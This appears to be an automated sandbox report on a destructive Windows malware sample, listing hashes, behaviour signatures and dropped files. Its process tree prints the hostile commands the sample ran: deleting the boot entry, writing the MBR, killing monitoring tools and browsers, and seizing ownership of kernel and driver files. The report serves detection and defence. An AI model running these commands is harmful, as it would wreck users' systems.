Analysis
-
max time kernel
20s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
18-05-2024 15:18
Static task
static1
Behavioral task
behavioral1
Sample
0x07.exe
Resource
win7-20240221-en
General
-
Target
0x07.exe
-
Size
247KB
-
MD5
733eb0ab951ae42a8d8cca413201e428
-
SHA1
640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
-
SHA256
52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
-
SHA512
c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
-
SSDEEP
3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1
Malware Config
Signatures
-
Possible privilege escalation attempt 25 IoCs
Processes:
takeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exepid process 1684 takeown.exe 912 icacls.exe 1492 takeown.exe 2300 takeown.exe 288 icacls.exe 1888 icacls.exe 2972 takeown.exe 2076 takeown.exe 1556 takeown.exe 1584 takeown.exe 1488 takeown.exe 2840 icacls.exe 2012 icacls.exe 2684 icacls.exe 2116 icacls.exe 1896 icacls.exe 964 takeown.exe 2372 takeown.exe 1836 takeown.exe 3020 icacls.exe 1004 icacls.exe 1236 takeown.exe 3012 takeown.exe 2948 icacls.exe 2320 icacls.exe -
Executes dropped EXE 2 IoCs
Processes:
winconfig.exeDetectKey.exepid process 2512 winconfig.exe 2608 DetectKey.exe -
Loads dropped DLL 1 IoCs
Processes:
0x07.exepid process 1968 0x07.exe -
Modifies file permissions 1 TTPs 25 IoCs
Processes:
icacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exepid process 1896 icacls.exe 1684 takeown.exe 1236 takeown.exe 2076 takeown.exe 1004 icacls.exe 1492 takeown.exe 2300 takeown.exe 912 icacls.exe 2320 icacls.exe 1584 takeown.exe 2948 icacls.exe 2012 icacls.exe 3020 icacls.exe 1888 icacls.exe 3012 takeown.exe 1556 takeown.exe 288 icacls.exe 2684 icacls.exe 1488 takeown.exe 2840 icacls.exe 2372 takeown.exe 1836 takeown.exe 2972 takeown.exe 964 takeown.exe 2116 icacls.exe -
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1940 bcdedit.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
0x07.exedescription ioc process File opened for modification \??\PhysicalDrive0 0x07.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
DetectKey.exepid process 2608 DetectKey.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 2620 WMIC.exe Token: SeSecurityPrivilege 2620 WMIC.exe Token: SeTakeOwnershipPrivilege 2620 WMIC.exe Token: SeLoadDriverPrivilege 2620 WMIC.exe Token: SeSystemProfilePrivilege 2620 WMIC.exe Token: SeSystemtimePrivilege 2620 WMIC.exe Token: SeProfSingleProcessPrivilege 2620 WMIC.exe Token: SeIncBasePriorityPrivilege 2620 WMIC.exe Token: SeCreatePagefilePrivilege 2620 WMIC.exe Token: SeBackupPrivilege 2620 WMIC.exe Token: SeRestorePrivilege 2620 WMIC.exe Token: SeShutdownPrivilege 2620 WMIC.exe Token: SeDebugPrivilege 2620 WMIC.exe Token: SeSystemEnvironmentPrivilege 2620 WMIC.exe Token: SeRemoteShutdownPrivilege 2620 WMIC.exe Token: SeUndockPrivilege 2620 WMIC.exe Token: SeManageVolumePrivilege 2620 WMIC.exe Token: 33 2620 WMIC.exe Token: 34 2620 WMIC.exe Token: 35 2620 WMIC.exe Token: SeIncreaseQuotaPrivilege 2620 WMIC.exe Token: SeSecurityPrivilege 2620 WMIC.exe Token: SeTakeOwnershipPrivilege 2620 WMIC.exe Token: SeLoadDriverPrivilege 2620 WMIC.exe Token: SeSystemProfilePrivilege 2620 WMIC.exe Token: SeSystemtimePrivilege 2620 WMIC.exe Token: SeProfSingleProcessPrivilege 2620 WMIC.exe Token: SeIncBasePriorityPrivilege 2620 WMIC.exe Token: SeCreatePagefilePrivilege 2620 WMIC.exe Token: SeBackupPrivilege 2620 WMIC.exe Token: SeRestorePrivilege 2620 WMIC.exe Token: SeShutdownPrivilege 2620 WMIC.exe Token: SeDebugPrivilege 2620 WMIC.exe Token: SeSystemEnvironmentPrivilege 2620 WMIC.exe Token: SeRemoteShutdownPrivilege 2620 WMIC.exe Token: SeUndockPrivilege 2620 WMIC.exe Token: SeManageVolumePrivilege 2620 WMIC.exe Token: 33 2620 WMIC.exe Token: 34 2620 WMIC.exe Token: 35 2620 WMIC.exe Token: SeIncreaseQuotaPrivilege 2456 WMIC.exe Token: SeSecurityPrivilege 2456 WMIC.exe Token: SeTakeOwnershipPrivilege 2456 WMIC.exe Token: SeLoadDriverPrivilege 2456 WMIC.exe Token: SeSystemProfilePrivilege 2456 WMIC.exe Token: SeSystemtimePrivilege 2456 WMIC.exe Token: SeProfSingleProcessPrivilege 2456 WMIC.exe Token: SeIncBasePriorityPrivilege 2456 WMIC.exe Token: SeCreatePagefilePrivilege 2456 WMIC.exe Token: SeBackupPrivilege 2456 WMIC.exe Token: SeRestorePrivilege 2456 WMIC.exe Token: SeShutdownPrivilege 2456 WMIC.exe Token: SeDebugPrivilege 2456 WMIC.exe Token: SeSystemEnvironmentPrivilege 2456 WMIC.exe Token: SeRemoteShutdownPrivilege 2456 WMIC.exe Token: SeUndockPrivilege 2456 WMIC.exe Token: SeManageVolumePrivilege 2456 WMIC.exe Token: 33 2456 WMIC.exe Token: 34 2456 WMIC.exe Token: 35 2456 WMIC.exe Token: SeIncreaseQuotaPrivilege 2456 WMIC.exe Token: SeSecurityPrivilege 2456 WMIC.exe Token: SeTakeOwnershipPrivilege 2456 WMIC.exe Token: SeLoadDriverPrivilege 2456 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0x07.exewinconfig.execmd.exedescription pid process target process PID 1968 wrote to memory of 2512 1968 0x07.exe winconfig.exe PID 1968 wrote to memory of 2512 1968 0x07.exe winconfig.exe PID 1968 wrote to memory of 2512 1968 0x07.exe winconfig.exe PID 1968 wrote to memory of 2512 1968 0x07.exe winconfig.exe PID 2512 wrote to memory of 2672 2512 winconfig.exe cmd.exe PID 2512 wrote to memory of 2672 2512 winconfig.exe cmd.exe PID 2512 wrote to memory of 2672 2512 winconfig.exe cmd.exe PID 2512 wrote to memory of 2672 2512 winconfig.exe cmd.exe PID 2672 wrote to memory of 2608 2672 cmd.exe DetectKey.exe PID 2672 wrote to memory of 2608 2672 cmd.exe DetectKey.exe PID 2672 wrote to memory of 2608 2672 cmd.exe DetectKey.exe PID 2672 wrote to memory of 2608 2672 cmd.exe DetectKey.exe PID 2672 wrote to memory of 1940 2672 cmd.exe bcdedit.exe PID 2672 wrote to memory of 1940 2672 cmd.exe bcdedit.exe PID 2672 wrote to memory of 1940 2672 cmd.exe bcdedit.exe PID 2672 wrote to memory of 2620 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2620 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2620 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2456 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2456 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2456 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2428 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2428 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2428 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2460 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2460 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2460 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2228 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2228 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2228 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1588 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1588 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1588 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2596 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2596 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2596 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2760 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2760 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2760 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2856 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2856 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2856 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2900 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2900 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 2900 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 284 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 284 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 284 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1576 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1576 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1576 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1624 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1624 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1624 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 868 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 868 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 868 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1272 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1272 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1272 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 536 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 536 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 536 2672 cmd.exe WMIC.exe PID 2672 wrote to memory of 1196 2672 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0x07.exe"C:\Users\Admin\AppData\Local\Temp\0x07.exe"1⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\winconfig.exe"C:\Windows\Temp\winconfig.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E94.tmp\5E95.tmp\5E96.bat C:\Windows\Temp\winconfig.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\DetectKey.exe"C:\Users\Admin\AppData\Roaming\DetectKey.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\bcdedit.exebcdedit /delete {current}4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='mmc.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='PartAssist.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='control.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager Protable.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='CCleaner.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64a.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='regedit.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='iexplore.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='chrome.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='firefox.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='opera.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='edge.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='msedge.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='brave.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='wmplayer.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad++.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskmgr.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\hal.dll"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\winload.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\ntoskrnl.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\perfmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\resmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskkill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tasklist.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tskill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Process Hacker 2"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\drivers"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\winload.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Program Files\Process Hacker 2" /grant "everyone":F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\system32\cacls.execacls "C:\Windows\System32\drivers" /grant "everyone":F4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\5E94.tmp\5E95.tmp\5E96.batFilesize
5KB
MD5a645734f3bf4a2682cbaf546789ec0c4
SHA1fafcc11909412bf51f217e12dfaa93a15181a3e2
SHA2563b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
SHA512efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d
-
C:\Users\Admin\AppData\Roaming\DetectKey.exeFilesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
\Windows\Temp\winconfig.exeFilesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b